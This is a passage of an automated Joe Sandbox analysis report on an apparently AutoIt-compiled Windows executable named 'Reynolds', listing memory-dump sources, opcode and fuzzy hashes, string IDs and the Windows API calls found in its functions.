                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 49a97c8ce8b369b2f42047b1b1bb4140d0dd21c8d4100dd6dfdde4f7fa664e0d
                                                                                                      • Instruction ID: 9d9921e65b69a7f61debe2fb149288cf364ec4c8a6832d3af2e4c756d2ac3e26
                                                                                                      • Opcode Fuzzy Hash: 49a97c8ce8b369b2f42047b1b1bb4140d0dd21c8d4100dd6dfdde4f7fa664e0d
                                                                                                      • Instruction Fuzzy Hash: 7E81C322E1A616E5F712BB65E440ABDAAB4BB40B44F8641B5DD0E166E5CF38E40BC730
                                                                                                      APIs
Memory Dump Source
• Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
• Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
• String ID:
• API String ID: 3659116390-0
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
APIs
Similarity
• API ID: AddressProc
• String ID:
• API String ID: 190572456-0
APIs
Similarity
• API ID: Window$Show$Enable
• String ID:
• API String ID: 2939132127-0
APIs
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
APIs
Similarity
• API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
• String ID:
• API String ID: 2067211477-0
APIs
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
APIs
Similarity
• API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
• String ID:
• API String ID: 2117695475-0
APIs
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
APIs
• EnterCriticalSection.KERNEL32(?,?,?,00007FF7AA13B91D,?,?,?,00007FF7AA101CE2), ref: 00007FF7AA170774
• TerminateThread.KERNEL32(?,?,?,00007FF7AA13B91D,?,?,?,00007FF7AA101CE2), ref: 00007FF7AA17077F
• WaitForSingleObject.KERNEL32(?,?,?,00007FF7AA13B91D,?,?,?,00007FF7AA101CE2), ref: 00007FF7AA17078D
• ~SyncLockT.VCCORLIB ref: 00007FF7AA170796
  • Part of subcall function 00007FF7AA16FF10: CloseHandle.KERNEL32(?,?,?,00007FF7AA17079B,?,?,?,00007FF7AA13B91D,?,?,?,00007FF7AA101CE2), ref: 00007FF7AA16FF21
• LeaveCriticalSection.KERNEL32(?,?,?,00007FF7AA13B91D,?,?,?,00007FF7AA101CE2), ref: 00007FF7AA1707A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                                                                      • String ID:
                                                                                                      • API String ID: 3142591903-0
Memory Dump Source
• Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
• Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
• API ID: ErrorExitLastThread
• String ID:
• API String ID: 1611280651-0
Memory Dump Source
• Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
• Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
Memory Dump Source
• Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
• Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: UTF-16LEUNICODE$UTF-8$ccs
• API String ID: 3215553584-1196891531
APIs
  • Part of subcall function 00007FF7AA0F4050: MapVirtualKeyW.USER32(?,?,?,00007FF7AA0F4DDE), ref: 00007FF7AA0F4082
  • Part of subcall function 00007FF7AA0F4050: MapVirtualKeyW.USER32(?,?,?,00007FF7AA0F4DDE), ref: 00007FF7AA0F4090
  • Part of subcall function 00007FF7AA0F4050: MapVirtualKeyW.USER32(?,?,?,00007FF7AA0F4DDE), ref: 00007FF7AA0F40A0
  • Part of subcall function 00007FF7AA0F4050: MapVirtualKeyW.USER32(?,?,?,00007FF7AA0F4DDE), ref: 00007FF7AA0F40B0
  • Part of subcall function 00007FF7AA0F4050: MapVirtualKeyW.USER32(?,?,?,00007FF7AA0F4DDE), ref: 00007FF7AA0F40BE
  • Part of subcall function 00007FF7AA0F4050: MapVirtualKeyW.USER32(?,?,?,00007FF7AA0F4DDE), ref: 00007FF7AA0F40CC
  • Part of subcall function 00007FF7AA0F40DC: RegisterWindowMessageW.USER32(?,?,?,00007FF7AA0F4F68), ref: 00007FF7AA0F4146
• GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA0F106D), ref: 00007FF7AA0F5042
• OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA0F106D), ref: 00007FF7AA0F50C8
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA0F106D), ref: 00007FF7AA13B336
Memory Dump Source
• Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
• Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
• API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
• String ID: AutoIt
• API String ID: 1986988660-2515660138
Memory Dump Source
• Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
• Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: $*
• API String ID: 3215553584-3982473090
Memory Dump Source
• Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
• Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
• API ID: _set_statfp
• String ID: !$acos
• API String ID: 1156100317-2870037509
Memory Dump Source
• Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
Similarity
• API ID: strlen
• String ID: +
• API String ID: 39653677-2126386893
Memory Dump Source
• Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
• Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
• API ID: _set_statfp
• String ID: !$asin
• API String ID: 1156100317-2188059690
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strlen
                                                                                                      • String ID: +
                                                                                                      • API String ID: 39653677-2126386893
                                                                                                      • Opcode ID: d2e5f4007f08e449f8f41e5e05ed53f0d40ba1ede8cc3f59bf32b2d63b3e7f49
                                                                                                      • Instruction ID: 3c82ca7fd897361c305a600a51283018360b2bc7fba3730e006b1c2eed224172
                                                                                                      • Opcode Fuzzy Hash: d2e5f4007f08e449f8f41e5e05ed53f0d40ba1ede8cc3f59bf32b2d63b3e7f49
                                                                                                      • Instruction Fuzzy Hash: 1F51D463219AB08BEB368E25E05876EBFA1E3057D4F045249EBD747AC7C729D5C4CB00
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _errno$memset
                                                                                                      • String ID: P
                                                                                                      • API String ID: 1454687054-3110715001
                                                                                                      • Opcode ID: a1f4aa3473ea68791235c49223afddbcef7459d141dbb4cbad716c7f42946042
                                                                                                      • Instruction ID: d12a4e1e7a44b0f9225a16c4dc4cf7ec21cad0222971597ebcaa2ba919c25a54
                                                                                                      • Opcode Fuzzy Hash: a1f4aa3473ea68791235c49223afddbcef7459d141dbb4cbad716c7f42946042
                                                                                                      • Instruction Fuzzy Hash: 4C517163609AE487E6738F28A4593EEBBA0F795784F044142CFD647697DB28C9C6CB00
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Delete$InfoItem
                                                                                                      • String ID: P
                                                                                                      • API String ID: 135850232-3110715001
                                                                                                      • Opcode ID: f62664e60d2089e058bbf88f82fa64fb9d6e9027cc1cc1a0f268c82638e958f5
                                                                                                      • Instruction ID: 2f0e9f7b4d3022b085c1a520bff3fc3703bbd861c121ff8f7563bf05cc45b88c
                                                                                                      • Opcode Fuzzy Hash: f62664e60d2089e058bbf88f82fa64fb9d6e9027cc1cc1a0f268c82638e958f5
                                                                                                      • Instruction Fuzzy Hash: 8A41C332B09681D1F722EB15E4043ADA771EB84BA0F9B8271DA6D433E1DF38D442C721
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                      • String ID: U
                                                                                                      • API String ID: 2456169464-4171548499
                                                                                                      • Opcode ID: f09a28fcae5188001d86cef28677a7ab9bc0fda8486cb330b6ca1d514bdcb2ce
                                                                                                      • Instruction ID: 3af6be7eb5cedaf97e5e7bdec71dfa1656a38c38bb609aa7233ca48c212cb9b9
                                                                                                      • Opcode Fuzzy Hash: f09a28fcae5188001d86cef28677a7ab9bc0fda8486cb330b6ca1d514bdcb2ce
                                                                                                      • Instruction Fuzzy Hash: C2412122A1A641D2EB21EF21F4007AAABB4FB88794F864031EE4D837A4DF3CD006C710
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Long
                                                                                                      • String ID: SysTreeView32
                                                                                                      • API String ID: 847901565-1698111956
                                                                                                      • Opcode ID: 7bb5fa9822eba039514a9ba19c73050aeebd4584b22656b65eef0b423cabdd65
                                                                                                      • Instruction ID: 02b41d3965d877e46dea92d2e474865db4460d1d97f2059b92a023b069dbe41c
                                                                                                      • Opcode Fuzzy Hash: 7bb5fa9822eba039514a9ba19c73050aeebd4584b22656b65eef0b423cabdd65
                                                                                                      • Instruction Fuzzy Hash: 2A417E3260A6C2C6E7719B24E444B9AB3A1F784764F544375DAAC07BA8DF3CD846CB50
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$CreateObjectStock
                                                                                                      • String ID: SysMonthCal32
                                                                                                      • API String ID: 2671490118-1439706946
                                                                                                      • Opcode ID: 25626af29ff67ce8d6fd7c70d4133758a87d5dadaddcd57ce23f9999b42ad6ab
                                                                                                      • Instruction ID: 15d35524104d0044be435e0698601863105c8cc2014cf2444a9b8fadb513d45e
                                                                                                      • Opcode Fuzzy Hash: 25626af29ff67ce8d6fd7c70d4133758a87d5dadaddcd57ce23f9999b42ad6ab
                                                                                                      • Instruction Fuzzy Hash: C6418C326096C2DAE370DF15F044B6AB7A1F7887A0F414225EA9903AA8DF3CD482CF40
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: CCG
                                                                                                      • API String ID: 0-1584390748
                                                                                                      • Opcode ID: 54420618444acab10bb5244421e743109e1678589b264298e1a58604c8fdc360
                                                                                                      • Instruction ID: df76018ad77fcb23cfb0266da235f299d00eff85eb193abbe886be4cfeda1d4b
                                                                                                      • Opcode Fuzzy Hash: 54420618444acab10bb5244421e743109e1678589b264298e1a58604c8fdc360
                                                                                                      • Instruction Fuzzy Hash: 8721023370093843FA3B4EA5D9983791A8197847E4F2585A69FEB437D7CB2ECCC14200
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$CreateDestroyObjectStock
                                                                                                      • String ID: msctls_updown32
                                                                                                      • API String ID: 1752125012-2298589950
                                                                                                      • Opcode ID: 428f94a7a59cd7bf989baa6ef0aa5c6b519b04ddf6fb8b4790f89f2c0ee1e6c4
                                                                                                      • Instruction ID: 3616b2e4d07b4c9871d55fde2e9fa36dfb2e0176740c2dab86f2030556d6a201
                                                                                                      • Opcode Fuzzy Hash: 428f94a7a59cd7bf989baa6ef0aa5c6b519b04ddf6fb8b4790f89f2c0ee1e6c4
                                                                                                      • Instruction Fuzzy Hash: 9731CE72A19B81E6EB21DB15E4807AAB371FB85B91F418175DA8D43BA8CF3CD446CB10
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$CreateMoveObjectStock
                                                                                                      • String ID: Listbox
                                                                                                      • API String ID: 3747482310-2633736733
                                                                                                      • Opcode ID: 2d3583662e6f7e144ee14d910da68979ea0603b7228fe14a50fd2d5f2b3179cb
                                                                                                      • Instruction ID: aafbada9daf0de9bfdbf4d2c91c083a844c5b5497398609ced6d1057b1181cec
                                                                                                      • Opcode Fuzzy Hash: 2d3583662e6f7e144ee14d910da68979ea0603b7228fe14a50fd2d5f2b3179cb
                                                                                                      • Instruction Fuzzy Hash: E0314A326096C1DAE7709F15F444A5AB7B1F7887A0F904225EAA903BA8DB3DD486CF00
                                                                                                      APIs
                                                                                                      • GetOpenFileNameW.COMDLG32 ref: 00007FF7AA13B0D8
                                                                                                        • Part of subcall function 00007FF7AA0F5A50: GetFullPathNameW.KERNEL32(?,00007FF7AA0F5A3D,?,00007FF7AA0F4C50,?,?,?,00007FF7AA0F109E), ref: 00007FF7AA0F5A7B
                                                                                                        • Part of subcall function 00007FF7AA0F4694: GetLongPathNameW.KERNEL32 ref: 00007FF7AA0F46B8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                                                      • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                                                      • API String ID: 779396738-2360590182
                                                                                                      • Opcode ID: 16a998d4ffd8908b2b5846d7a7af52c857f6656f6899eb4e8e8eaa093dec734f
                                                                                                      • Instruction ID: f372918b012036ddb691910acf3967ad525e122e314346371644d9aeba06efd3
                                                                                                      • Opcode Fuzzy Hash: 16a998d4ffd8908b2b5846d7a7af52c857f6656f6899eb4e8e8eaa093dec734f
                                                                                                      • Instruction Fuzzy Hash: CD319C22A09B82D9F710AF21E8801ADB7B4FB49B84F998175DA8C43B65DF3CD156C720
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
